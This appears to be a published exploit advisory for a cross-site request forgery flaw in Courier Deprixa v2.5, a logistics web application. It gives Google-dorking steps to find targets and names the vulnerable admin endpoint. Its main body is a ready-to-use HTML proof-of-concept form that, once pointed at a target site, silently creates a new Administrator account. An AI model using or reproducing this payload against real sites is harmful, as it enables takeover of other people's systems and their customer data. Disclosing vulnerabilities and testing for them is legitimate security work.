Headline
COURIER DEPRIXA 2.5 Cross Site Request Forgery
COURIER DEPRIXA version 2.5 suffers from a cross site request forgery vulnerability.
====================================================================================================================================| # Title : COURIER DEPRIXA V2.5 CSRF Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | | # Vendor : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/ | | # Dork : |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 5.[+] Set the target site link Save changes and apply . [+] infected file : /deprixa/settings/addusersadmin/agregar.php[+] save code as poc.html [+] <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i> New Administrator</h4> </div> <div class="modal-body"> <!--Cuerpo del modal aquí el formulario--> <form action="https://127.0.0.1/galaxyexpressuaecom/deprixa/settings/addusersadmin/agregar.php" class="form-horizontal" method="post"> <div class="form-group " id="gnombrepa"> <label for="off_name" class="col-sm-2 control-label">Name</label> <div class="col-sm-10"> <input type="text" class="form-control off_name" name="name_parson" placeholder="Name Administrator "> </div> </div> <div class="form-group" id="gapellido"> <label for="email" class="col-sm-2 control-label">Email </label> <div class="col-sm-5"> <input type="text" class="form-control email" name="email" placeholder="Email "> </div> <div class="col-sm-5"> <input class="form-control phone" name="phone" placeholder="Phone"> </div> </div> <div class="form-group" id="gemail"> <label for="office" class="col-sm-2 control-label">Office</label> <div class="col-sm-5"> <input type="text" class="form-control office" name="office" placeholder="Office "> </div> <div class="col-sm-5"> <select type="text" class="form-control role" name="role" > <option value="Administrator">Administrator</option> </select> </div> </div> <div class="form-group " id="gnombre"> <label for="off_name" class="col-sm-2 control-label">User</label> <div class="col-sm-10"> <input type="text" class="form-control off_name" name="name" placeholder="User"> </div> </div> <div class="form-group" id="gpassword"> <label for="pwd" class="col-sm-2 control-label">Password</label> <div class="col-sm-10"> <input type="text" class="form-control pwd" name="pwd" placeholder="Password"> </div> </div> <div class="form-group"> <div class="col-sm-offset-2 col-sm-10"> <div class="checkbox checkbox-success"> <input id="checkbox3" type="checkbox" name="estado" value="1" checked> <label for="checkbox3"> Status </label> </div> <div class="checkbox checkbox-inline" > <input type="checkbox" name="type" value="a" onclick="return false" checked> <label for="inlineCheckbox3"> Type of user </label> </div> </div> </div> <!--Fin del cuerpo del modal--> </div> <div class="modal-footer"> <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i> Close</button> <input class="btn btn-success" name="Submit" type="submit" id="submit" value="Save"> </div> </form> </div> </div> </div> <!--fin de moGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |=======================================================================================================================================